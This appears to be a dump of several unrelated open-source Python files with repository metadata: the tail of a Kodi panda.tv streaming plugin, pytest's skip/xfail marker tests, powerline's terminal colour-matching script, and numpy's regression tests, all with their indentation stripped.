xbmcplugin.endOfDirectory(_handle)
def play_video(roomid):
"""
Play a video by the provided path.
:param path: str
:return: None
"""
f=urllib2.urlopen('http://www.panda.tv/api_room?roomid='+roomid)
r=f.read()
ss=json.loads(r)
hostname=ss['data']['hostinfo']['name']
roomname=ss['data']['roominfo']['name']
#s=re.search('''"room_key":"(.*?)"''',r).group(1)
s=ss['data']['videoinfo']['room_key']
img=ss['data']['hostinfo']['avatar']
combinedname=u'{0}:{1}'.format(hostname,roomname)
# Create a playable item with a path to play.
path='http://pl3.live.panda.tv/live_panda/{0}.flv'.format(s)
play_item = xbmcgui.ListItem(path=path,thumbnailImage=img)
play_item.setInfo(type="Video",infoLabels={"Title":combinedname})
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
# directly play the item.
xbmc.Player().play(path, play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring:
:return:
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
|
lgpl-3.0
|
krunal3103/servo
|
tests/wpt/web-platform-tests/tools/pytest/testing/test_skipping.py
|
165
|
26964
|
import pytest
import sys
from _pytest.skipping import MarkEvaluator, folded_skips, pytest_runtest_setup
from _pytest.runner import runtestprotocol
class TestEvaluator:
def test_no_marker(self, testdir):
item = testdir.getitem("def test_func(): pass")
evalskipif = MarkEvaluator(item, 'skipif')
assert not evalskipif
assert not evalskipif.istrue()
def test_marked_no_args(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == ""
assert not ev.get("run", False)
def test_marked_one_arg(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz("hasattr(os, 'sep')")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: hasattr(os, 'sep')"
@pytest.mark.skipif('sys.version_info[0] >= 3')
def test_marked_one_arg_unicode(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz(u"hasattr(os, 'sep')")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: hasattr(os, 'sep')"
def test_marked_one_arg_with_reason(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xyz("hasattr(os, 'sep')", attr=2, reason="hello world")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'xyz')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "hello world"
assert ev.get("attr") == 2
def test_marked_one_arg_twice(self, testdir):
lines = [
'''@pytest.mark.skipif("not hasattr(os, 'murks')")''',
'''@pytest.mark.skipif("hasattr(os, 'murks')")'''
]
for i in range(0, 2):
item = testdir.getitem("""
import pytest
%s
%s
def test_func():
pass
""" % (lines[i], lines[(i+1) %2]))
ev = MarkEvaluator(item, 'skipif')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: not hasattr(os, 'murks')"
def test_marked_one_arg_twice2(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.skipif("hasattr(os, 'murks')")
@pytest.mark.skipif("not hasattr(os, 'murks')")
def test_func():
pass
""")
ev = MarkEvaluator(item, 'skipif')
assert ev
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: not hasattr(os, 'murks')"
def test_marked_skip_with_not_string(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.skipif(False)
def test_func():
pass
""")
ev = MarkEvaluator(item, 'skipif')
exc = pytest.raises(pytest.fail.Exception, ev.istrue)
assert """Failed: you need to specify reason=STRING when using booleans as conditions.""" in exc.value.msg
def test_skipif_class(self, testdir):
item, = testdir.getitems("""
import pytest
class TestClass:
pytestmark = pytest.mark.skipif("config._hackxyz")
def test_func(self):
pass
""")
item.config._hackxyz = 3
ev = MarkEvaluator(item, 'skipif')
assert ev.istrue()
expl = ev.getexplanation()
assert expl == "condition: config._hackxyz"
class TestXFail:
@pytest.mark.parametrize('strict', [True, False])
def test_xfail_simple(self, testdir, strict):
item = testdir.getitem("""
import pytest
@pytest.mark.xfail(strict=%s)
def test_func():
assert 0
""" % strict)
reports = runtestprotocol(item, log=False)
assert len(reports) == 3
callreport = reports[1]
assert callreport.skipped
assert callreport.wasxfail == ""
def test_xfail_xpassed(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xfail
def test_func():
assert 1
""")
reports = runtestprotocol(item, log=False)
assert len(reports) == 3
callreport = reports[1]
assert callreport.failed
assert callreport.wasxfail == ""
def test_xfail_run_anyway(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.xfail
def test_func():
assert 0
def test_func2():
pytest.xfail("hello")
""")
result = testdir.runpytest("--runxfail")
result.stdout.fnmatch_lines([
"*def test_func():*",
"*assert 0*",
"*1 failed*1 pass*",
])
def test_xfail_evalfalse_but_fails(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.xfail('False')
def test_func():
assert 0
""")
reports = runtestprotocol(item, log=False)
callreport = reports[1]
assert callreport.failed
assert not hasattr(callreport, "wasxfail")
assert 'xfail' in callreport.keywords
def test_xfail_not_report_default(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail
def test_this():
assert 0
""")
testdir.runpytest(p, '-v')
#result.stdout.fnmatch_lines([
# "*HINT*use*-r*"
#])
def test_xfail_not_run_xfail_reporting(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail(run=False, reason="noway")
def test_this():
assert 0
@pytest.mark.xfail("True", run=False)
def test_this_true():
assert 0
@pytest.mark.xfail("False", run=False, reason="huh")
def test_this_false():
assert 1
""")
result = testdir.runpytest(p, '--report=xfailed', )
result.stdout.fnmatch_lines([
"*test_one*test_this*",
"*NOTRUN*noway",
"*test_one*test_this_true*",
"*NOTRUN*condition:*True*",
"*1 passed*",
])
def test_xfail_not_run_no_setup_run(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail(run=False, reason="hello")
def test_this():
assert 0
def setup_module(mod):
raise ValueError(42)
""")
result = testdir.runpytest(p, '--report=xfailed', )
result.stdout.fnmatch_lines([
"*test_one*test_this*",
"*NOTRUN*hello",
"*1 xfailed*",
])
def test_xfail_xpass(self, testdir):
p = testdir.makepyfile(test_one="""
import pytest
@pytest.mark.xfail
def test_that():
assert 1
""")
result = testdir.runpytest(p, '-rX')
result.stdout.fnmatch_lines([
"*XPASS*test_that*",
"*1 xpassed*"
])
assert result.ret == 0
def test_xfail_imperative(self, testdir):
p = testdir.makepyfile("""
import pytest
def test_this():
pytest.xfail("hello")
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 xfailed*",
])
result = testdir.runpytest(p, "-rx")
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*reason:*hello*",
])
result = testdir.runpytest(p, "--runxfail")
result.stdout.fnmatch_lines("*1 pass*")
def test_xfail_imperative_in_setup_function(self, testdir):
p = testdir.makepyfile("""
import pytest
def setup_function(function):
pytest.xfail("hello")
def test_this():
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 xfailed*",
])
result = testdir.runpytest(p, "-rx")
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*reason:*hello*",
])
result = testdir.runpytest(p, "--runxfail")
result.stdout.fnmatch_lines("""
*def test_this*
*1 fail*
""")
def xtest_dynamic_xfail_set_during_setup(self, testdir):
p = testdir.makepyfile("""
import pytest
def setup_function(function):
pytest.mark.xfail(function)
def test_this():
assert 0
def test_that():
assert 1
""")
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*XPASS*test_that*",
])
def test_dynamic_xfail_no_run(self, testdir):
p = testdir.makepyfile("""
import pytest
def pytest_funcarg__arg(request):
request.applymarker(pytest.mark.xfail(run=False))
def test_this(arg):
assert 0
""")
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines([
"*XFAIL*test_this*",
"*NOTRUN*",
])
def test_dynamic_xfail_set_during_funcarg_setup(self, testdir):
p = testdir.makepyfile("""
import pytest
def pytest_funcarg__arg(request):
request.applymarker(pytest.mark.xfail)
def test_this2(arg):
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 xfailed*",
])
@pytest.mark.parametrize('expected, actual, matchline',
[('TypeError', 'TypeError', "*1 xfailed*"),
('(AttributeError, TypeError)', 'TypeError', "*1 xfailed*"),
('TypeError', 'IndexError', "*1 failed*"),
('(AttributeError, TypeError)', 'IndexError', "*1 failed*"),
])
def test_xfail_raises(self, expected, actual, matchline, testdir):
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(raises=%s)
def test_raises():
raise %s()
""" % (expected, actual))
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
matchline,
])
def test_strict_sanity(self, testdir):
"""sanity check for xfail(strict=True): a failing test should behave
exactly like a normal xfail.
"""
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(reason='unsupported feature', strict=True)
def test_foo():
assert 0
""")
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines([
'*XFAIL*',
'*unsupported feature*',
])
assert result.ret == 0
@pytest.mark.parametrize('strict', [True, False])
def test_strict_xfail(self, testdir, strict):
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(reason='unsupported feature', strict=%s)
def test_foo():
with open('foo_executed', 'w'): pass # make sure test executes
""" % strict)
result = testdir.runpytest(p, '-rxX')
if strict:
result.stdout.fnmatch_lines([
'*test_foo*',
'*XPASS(strict)*unsupported feature*',
])
else:
result.stdout.fnmatch_lines([
'*test_strict_xfail*',
'XPASS test_strict_xfail.py::test_foo unsupported feature',
])
assert result.ret == (1 if strict else 0)
assert testdir.tmpdir.join('foo_executed').isfile()
@pytest.mark.parametrize('strict', [True, False])
def test_strict_xfail_condition(self, testdir, strict):
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(False, reason='unsupported feature', strict=%s)
def test_foo():
pass
""" % strict)
result = testdir.runpytest(p, '-rxX')
result.stdout.fnmatch_lines('*1 passed*')
assert result.ret == 0
@pytest.mark.parametrize('strict_val', ['true', 'false'])
def test_strict_xfail_default_from_file(self, testdir, strict_val):
testdir.makeini('''
[pytest]
xfail_strict = %s
''' % strict_val)
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail(reason='unsupported feature')
def test_foo():
pass
""")
result = testdir.runpytest(p, '-rxX')
strict = strict_val == 'true'
result.stdout.fnmatch_lines('*1 failed*' if strict else '*1 xpassed*')
assert result.ret == (1 if strict else 0)
class TestXFailwithSetupTeardown:
def test_failing_setup_issue9(self, testdir):
testdir.makepyfile("""
import pytest
def setup_function(func):
assert 0
@pytest.mark.xfail
def test_func():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*1 xfail*",
])
def test_failing_teardown_issue9(self, testdir):
testdir.makepyfile("""
import pytest
def teardown_function(func):
assert 0
@pytest.mark.xfail
def test_func():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*1 xfail*",
])
class TestSkip:
def test_skip_class(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip
class TestSomething(object):
def test_foo(self):
pass
def test_bar(self):
pass
def test_baz():
pass
""")
rec = testdir.inline_run()
rec.assertoutcome(skipped=2, passed=1)
def test_skips_on_false_string(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip('False')
def test_foo():
pass
""")
rec = testdir.inline_run()
rec.assertoutcome(skipped=1)
def test_arg_as_reason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip('testing stuff')
def test_bar():
pass
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*testing stuff*",
"*1 skipped*",
])
def test_skip_no_reason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip
def test_foo():
pass
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*unconditional skip*",
"*1 skipped*",
])
def test_skip_with_reason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip(reason="for lolz")
def test_bar():
pass
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*for lolz*",
"*1 skipped*",
])
def test_only_skips_marked_test(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skip
def test_foo():
pass
@pytest.mark.skip(reason="nothing in particular")
def test_bar():
pass
def test_baz():
assert True
""")
result = testdir.runpytest('-rs')
result.stdout.fnmatch_lines([
"*nothing in particular*",
"*1 passed*2 skipped*",
])
class TestSkipif:
def test_skipif_conditional(self, testdir):
item = testdir.getitem("""
import pytest
@pytest.mark.skipif("hasattr(os, 'sep')")
def test_func():
pass
""") # noqa
x = pytest.raises(pytest.skip.Exception, lambda:
pytest_runtest_setup(item))
assert x.value.msg == "condition: hasattr(os, 'sep')"
@pytest.mark.parametrize('params', [
'"hasattr(sys, \'platform\')"',
'True, reason="invalid platform"',
])
def test_skipif_reporting(self, testdir, params):
p = testdir.makepyfile(test_foo="""
import pytest
@pytest.mark.skipif(%(params)s)
def test_that():
assert 0
""" % dict(params=params))
result = testdir.runpytest(p, '-s', '-rs')
result.stdout.fnmatch_lines([
"*SKIP*1*test_foo.py*platform*",
"*1 skipped*"
])
assert result.ret == 0
@pytest.mark.parametrize('marker, msg1, msg2', [
('skipif', 'SKIP', 'skipped'),
('xfail', 'XPASS', 'xpassed'),
])
def test_skipif_reporting_multiple(self, testdir, marker, msg1, msg2):
testdir.makepyfile(test_foo="""
import pytest
@pytest.mark.{marker}(False, reason='first_condition')
@pytest.mark.{marker}(True, reason='second_condition')
def test_foobar():
assert 1
""".format(marker=marker))
result = testdir.runpytest('-s', '-rsxX')
result.stdout.fnmatch_lines([
"*{msg1}*test_foo.py*second_condition*".format(msg1=msg1),
"*1 {msg2}*".format(msg2=msg2),
])
assert result.ret == 0
def test_skip_not_report_default(testdir):
p = testdir.makepyfile(test_one="""
import pytest
def test_this():
pytest.skip("hello")
""")
result = testdir.runpytest(p, '-v')
result.stdout.fnmatch_lines([
#"*HINT*use*-r*",
"*1 skipped*",
])
def test_skipif_class(testdir):
p = testdir.makepyfile("""
import pytest
class TestClass:
pytestmark = pytest.mark.skipif("True")
def test_that(self):
assert 0
def test_though(self):
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*2 skipped*"
])
def test_skip_reasons_folding():
path = 'xyz'
lineno = 3
message = "justso"
longrepr = (path, lineno, message)
class X:
pass
ev1 = X()
ev1.when = "execute"
ev1.skipped = True
ev1.longrepr = longrepr
ev2 = X()
ev2.longrepr = longrepr
ev2.skipped = True
l = folded_skips([ev1, ev2])
assert len(l) == 1
num, fspath, lineno, reason = l[0]
assert num == 2
assert fspath == path
assert lineno == lineno
assert reason == message
def test_skipped_reasons_functional(testdir):
testdir.makepyfile(
test_one="""
from conftest import doskip
def setup_function(func):
doskip()
def test_func():
pass
class TestClass:
def test_method(self):
doskip()
""",
test_two = """
from conftest import doskip
doskip()
""",
conftest = """
import pytest
def doskip():
pytest.skip('test')
"""
)
result = testdir.runpytest('--report=skipped')
result.stdout.fnmatch_lines([
"*SKIP*3*conftest.py:3: test",
])
assert result.ret == 0
def test_reportchars(testdir):
testdir.makepyfile("""
import pytest
def test_1():
assert 0
@pytest.mark.xfail
def test_2():
assert 0
@pytest.mark.xfail
def test_3():
pass
def test_4():
pytest.skip("four")
""")
result = testdir.runpytest("-rfxXs")
result.stdout.fnmatch_lines([
"FAIL*test_1*",
"XFAIL*test_2*",
"XPASS*test_3*",
"SKIP*four*",
])
def test_reportchars_error(testdir):
testdir.makepyfile(
conftest="""
def pytest_runtest_teardown():
assert 0
""",
test_simple="""
def test_foo():
pass
""")
result = testdir.runpytest('-rE')
result.stdout.fnmatch_lines([
'ERROR*test_foo*',
])
def test_reportchars_all(testdir):
testdir.makepyfile("""
import pytest
def test_1():
assert 0
@pytest.mark.xfail
def test_2():
assert 0
@pytest.mark.xfail
def test_3():
pass
def test_4():
pytest.skip("four")
""")
result = testdir.runpytest("-ra")
result.stdout.fnmatch_lines([
"FAIL*test_1*",
"SKIP*four*",
"XFAIL*test_2*",
"XPASS*test_3*",
])
def test_reportchars_all_error(testdir):
testdir.makepyfile(
conftest="""
def pytest_runtest_teardown():
assert 0
""",
test_simple="""
def test_foo():
pass
""")
result = testdir.runpytest('-ra')
result.stdout.fnmatch_lines([
'ERROR*test_foo*',
])
@pytest.mark.xfail("hasattr(sys, 'pypy_version_info')")
def test_errors_in_xfail_skip_expressions(testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif("asd")
def test_nameerror():
pass
@pytest.mark.xfail("syntax error")
def test_syntax():
pass
def test_func():
pass
""")
result = testdir.runpytest()
markline = " ^"
if sys.platform.startswith("java"):
# XXX report this to java
markline = "*" + markline[8:]
result.stdout.fnmatch_lines([
"*ERROR*test_nameerror*",
"*evaluating*skipif*expression*",
"*asd*",
"*ERROR*test_syntax*",
"*evaluating*xfail*expression*",
" syntax error",
markline,
"SyntaxError: invalid syntax",
"*1 pass*2 error*",
])
def test_xfail_skipif_with_globals(testdir):
testdir.makepyfile("""
import pytest
x = 3
@pytest.mark.skipif("x == 3")
def test_skip1():
pass
@pytest.mark.xfail("x == 3")
def test_boolean():
assert 0
""")
result = testdir.runpytest("-rsx")
result.stdout.fnmatch_lines([
"*SKIP*x == 3*",
"*XFAIL*test_boolean*",
"*x == 3*",
])
def test_direct_gives_error(testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif(True)
def test_skip1():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*1 error*",
])
def test_default_markers(testdir):
result = testdir.runpytest("--markers")
result.stdout.fnmatch_lines([
"*skipif(*condition)*skip*",
"*xfail(*condition, reason=None, run=True, raises=None)*expected failure*",
])
def test_xfail_test_setup_exception(testdir):
testdir.makeconftest("""
def pytest_runtest_setup():
0 / 0
""")
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail
def test_func():
assert 0
""")
result = testdir.runpytest(p)
assert result.ret == 0
assert 'xfailed' in result.stdout.str()
assert 'xpassed' not in result.stdout.str()
def test_imperativeskip_on_xfail_test(testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.xfail
def test_that_fails():
assert 0
@pytest.mark.skipif("True")
def test_hello():
pass
""")
testdir.makeconftest("""
import pytest
def pytest_runtest_setup(item):
pytest.skip("abc")
""")
result = testdir.runpytest("-rsxX")
result.stdout.fnmatch_lines_random("""
*SKIP*abc*
*SKIP*condition: True*
*2 skipped*
""")
class TestBooleanCondition:
def test_skipif(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif(True, reason="True123")
def test_func1():
pass
@pytest.mark.skipif(False, reason="True123")
def test_func2():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines("""
*1 passed*1 skipped*
""")
def test_skipif_noreason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif(True)
def test_func():
pass
""")
result = testdir.runpytest("-rs")
result.stdout.fnmatch_lines("""
*1 error*
""")
def test_xfail(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.xfail(True, reason="True123")
def test_func():
assert 0
""")
result = testdir.runpytest("-rxs")
result.stdout.fnmatch_lines("""
*XFAIL*
*True123*
*1 xfail*
""")
def test_xfail_item(testdir):
# Ensure pytest.xfail works with non-Python Item
testdir.makeconftest("""
import pytest
class MyItem(pytest.Item):
nodeid = 'foo'
def runtest(self):
pytest.xfail("Expected Failure")
def pytest_collect_file(path, parent):
return MyItem("foo", parent)
""")
result = testdir.inline_run()
passed, skipped, failed = result.listoutcomes()
assert not failed
xfailed = [r for r in skipped if hasattr(r, 'wasxfail')]
assert xfailed
|
mpl-2.0
|
bezhermoso/powerline
|
tools/colors_find.py
|
32
|
1671
|
#!/usr/bin/env python
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import os
from colormath.color_objects import sRGBColor, LabColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
def get_lab(name, rgb):
rgb = sRGBColor(
int(rgb[:2], 16), int(rgb[2:4], 16), int(rgb[4:6], 16),
is_upscaled=True
)
lab = convert_color(rgb, LabColor)
return name, lab
with open(os.path.join(os.path.dirname(__file__), 'colors.map'), 'r') as f:
colors = [get_lab(*line.split('\t')) for line in f]
ulab = get_lab(None, sys.argv[1])[1]
def find_color(urgb, colors):
cur_distance = 3 * (255 ** 2 + 1)
cur_color = None
for color, clab in colors:
dist = delta_e_cie2000(ulab, clab)
if dist < cur_distance:
cur_distance = dist
cur_color = (color, clab)
return cur_color
cur_color = find_color(ulab, colors)
def lab_to_csi(lab):
rgb = convert_color(lab, sRGBColor)
colstr = ';2;' + ';'.join((str(i) for i in get_upscaled_values(rgb)))
return colstr + 'm'
def get_upscaled_values(rgb):
return [min(max(0, i), 255) for i in rgb.get_upscaled_value_tuple()]
def get_rgb(lab):
rgb = convert_color(lab, sRGBColor)
rgb = sRGBColor(*get_upscaled_values(rgb), is_upscaled=True)
return rgb.get_rgb_hex()[1:]
print(get_rgb(ulab), ':', cur_color[0], ':', get_rgb(cur_color[1]))
col_1 = lab_to_csi(ulab)
col_2 = lab_to_csi(cur_color[1])
sys.stdout.write('\033[48' + col_1 + '\033[38' + col_2 + 'abc\033[0m <-- bg:urgb, fg:crgb\n')
sys.stdout.write('\033[48' + col_2 + '\033[38' + col_1 + 'abc\033[0m <-- bg:crgb, fg:urgb\n')
|
mit
|
xxd3vin/spp-sdk
|
opt/Python27/Lib/site-packages/numpy/lib/tests/test_regression.py
|
11
|
8028
|
from numpy.testing import *
from numpy.testing.utils import _assert_valid_refcount
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_poly1d(self,level=rlevel):
"""Ticket #28"""
assert_equal(np.poly1d([1]) - np.poly1d([1,0]),
np.poly1d([-1,1]))
def test_cov_parameters(self,level=rlevel):
"""Ticket #91"""
x = np.random.random((3,3))
y = x.copy()
np.cov(x, rowvar=1)
np.cov(y, rowvar=0)
assert_array_equal(x,y)
def test_mem_digitize(self,level=rlevel):
"""Ticket #95"""
for i in range(100):
np.digitize([1,2,3,4],[1,3])
np.digitize([0,1,2,3,4],[1,3])
def test_unique_zero_sized(self,level=rlevel):
"""Ticket #205"""
assert_array_equal([], np.unique(np.array([])))
def test_mem_vectorise(self, level=rlevel):
"""Ticket #325"""
vt = np.vectorize(lambda *args: args)
vt(np.zeros((1,2,1)), np.zeros((2,1,1)), np.zeros((1,1,2)))
vt(np.zeros((1,2,1)), np.zeros((2,1,1)), np.zeros((1,1,2)), np.zeros((2,2)))
def test_mgrid_single_element(self, level=rlevel):
"""Ticket #339"""
assert_array_equal(np.mgrid[0:0:1j],[0])
assert_array_equal(np.mgrid[0:0],[])
def test_refcount_vectorize(self, level=rlevel):
"""Ticket #378"""
def p(x,y): return 123
v = np.vectorize(p)
_assert_valid_refcount(v)
def test_poly1d_nan_roots(self, level=rlevel):
"""Ticket #396"""
p = np.poly1d([np.nan,np.nan,1], r=0)
self.assertRaises(np.linalg.LinAlgError,getattr,p,"r")
def test_mem_polymul(self, level=rlevel):
"""Ticket #448"""
np.polymul([],[1.])
def test_mem_string_concat(self, level=rlevel):
"""Ticket #469"""
x = np.array([])
np.append(x,'asdasd\tasdasd')
def test_poly_div(self, level=rlevel):
"""Ticket #553"""
u = np.poly1d([1,2,3])
v = np.poly1d([1,2,3,4,5])
q,r = np.polydiv(u,v)
assert_equal(q*v + r, u)
def test_poly_eq(self, level=rlevel):
"""Ticket #554"""
x = np.poly1d([1,2,3])
y = np.poly1d([3,4])
assert_(x != y)
assert_(x == x)
def test_mem_insert(self, level=rlevel):
"""Ticket #572"""
np.lib.place(1,1,1)
def test_polyfit_build(self):
"""Ticket #628"""
ref = [-1.06123820e-06, 5.70886914e-04, -1.13822012e-01,
9.95368241e+00, -3.14526520e+02]
x = [90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103,
104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115,
116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 129,
130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141,
146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157,
158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169,
170, 171, 172, 173, 174, 175, 176]
y = [9.0, 3.0, 7.0, 4.0, 4.0, 8.0, 6.0, 11.0, 9.0, 8.0, 11.0, 5.0,
6.0, 5.0, 9.0, 8.0, 6.0, 10.0, 6.0, 10.0, 7.0, 6.0, 6.0, 6.0,
13.0, 4.0, 9.0, 11.0, 4.0, 5.0, 8.0, 5.0, 7.0, 7.0, 6.0, 12.0,
7.0, 7.0, 9.0, 4.0, 12.0, 6.0, 6.0, 4.0, 3.0, 9.0, 8.0, 8.0,
6.0, 7.0, 9.0, 10.0, 6.0, 8.0, 4.0, 7.0, 7.0, 10.0, 8.0, 8.0,
6.0, 3.0, 8.0, 4.0, 5.0, 7.0, 8.0, 6.0, 6.0, 4.0, 12.0, 9.0,
8.0, 8.0, 8.0, 6.0, 7.0, 4.0, 4.0, 5.0, 7.0]
tested = np.polyfit(x, y, 4)
assert_array_almost_equal(ref, tested)
def test_polydiv_type(self) :
"""Make polydiv work for complex types"""
msg = "Wrong type, should be complex"
x = np.ones(3, dtype=np.complex)
q,r = np.polydiv(x,x)
assert_(q.dtype == np.complex, msg)
msg = "Wrong type, should be float"
x = np.ones(3, dtype=np.int)
q,r = np.polydiv(x,x)
assert_(q.dtype == np.float, msg)
def test_histogramdd_too_many_bins(self) :
"""Ticket 928."""
assert_raises(ValueError, np.histogramdd, np.ones((1,10)), bins=2**10)
def test_polyint_type(self) :
"""Ticket #944"""
msg = "Wrong type, should be complex"
x = np.ones(3, dtype=np.complex)
assert_(np.polyint(x).dtype == np.complex, msg)
msg = "Wrong type, should be float"
x = np.ones(3, dtype=np.int)
assert_(np.polyint(x).dtype == np.float, msg)
def test_ndenumerate_crash(self):
"""Ticket 1140"""
# Shouldn't crash:
list(np.ndenumerate(np.array([[]])))
def test_asfarray_none(self, level=rlevel):
"""Test for changeset r5065"""
assert_array_equal(np.array([np.nan]), np.asfarray([None]))
def test_large_fancy_indexing(self, level=rlevel):
# Large enough to fail on 64-bit.
nbits = np.dtype(np.intp).itemsize * 8
thesize = int((2**nbits)**(1.0/5.0)+1)
def dp():
n = 3
a = np.ones((n,)*5)
i = np.random.randint(0,n,size=thesize)
a[np.ix_(i,i,i,i,i)] = 0
def dp2():
n = 3
a = np.ones((n,)*5)
i = np.random.randint(0,n,size=thesize)
g = a[np.ix_(i,i,i,i,i)]
self.assertRaises(ValueError, dp)
self.assertRaises(ValueError, dp2)
def test_void_coercion(self, level=rlevel):
dt = np.dtype([('a','f4'),('b','i4')])
x = np.zeros((1,),dt)
assert_(np.r_[x,x].dtype == dt)
def test_who_with_0dim_array(self, level=rlevel) :
"""ticket #1243"""
import os, sys
oldstdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
try:
try:
tmp = np.who({'foo' : np.array(1)})
except:
raise AssertionError("ticket #1243")
finally:
sys.stdout.close()
sys.stdout = oldstdout
def test_include_dirs(self):
"""As a sanity check, just test that get_include and
get_numarray_include include something reasonable. Somewhat
related to ticket #1405."""
include_dirs = [np.get_include(), np.get_numarray_include()]
for path in include_dirs:
assert_(isinstance(path, (str, unicode)))
assert_(path != '')
def test_polyder_return_type(self):
"""Ticket #1249"""
assert_(isinstance(np.polyder(np.poly1d([1]), 0), np.poly1d))
assert_(isinstance(np.polyder([1], 0), np.ndarray))
assert_(isinstance(np.polyder(np.poly1d([1]), 1), np.poly1d))
assert_(isinstance(np.polyder([1], 1), np.ndarray))
def test_append_fields_dtype_list(self):
"""Ticket #1676"""
from numpy.lib.recfunctions import append_fields
F = False
base = np.array([1,2,3], dtype=np.int32)
data = np.eye(3).astype(np.int32)
names = ['a','b','c']
dlist = [np.float64, np.int32, np.int32]
try:
a = append_fields(base, names, data, dlist)
except:
raise AssertionError()
def test_loadtxt_fields_subarrays(self):
# For ticket #1936
from StringIO import StringIO
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
x = np.loadtxt(StringIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
dt = [("a", [("a", 'u1', (1,3)), ("b", 'u1')])]
x = np.loadtxt(StringIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([(((0,1,2), 3),)], dtype=dt))
dt = [("a", 'u1', (2,2))]
x = np.loadtxt(StringIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([(((0, 1), (2, 3)),)], dtype=dt))
dt = [("a", 'u1', (2,3,2))]
x = np.loadtxt(StringIO("0 1 2 3 4 5 6 7 8 9 10 11"), dtype=dt)
data = [((((0,1), (2,3), (4,5)), ((6,7), (8,9), (10,11))),)]
assert_equal(x, np.array(data, dtype=dt))
if __name__ == "__main__":
run_module_suite()
|
mit
|
rajat1994/scikit-learn
|
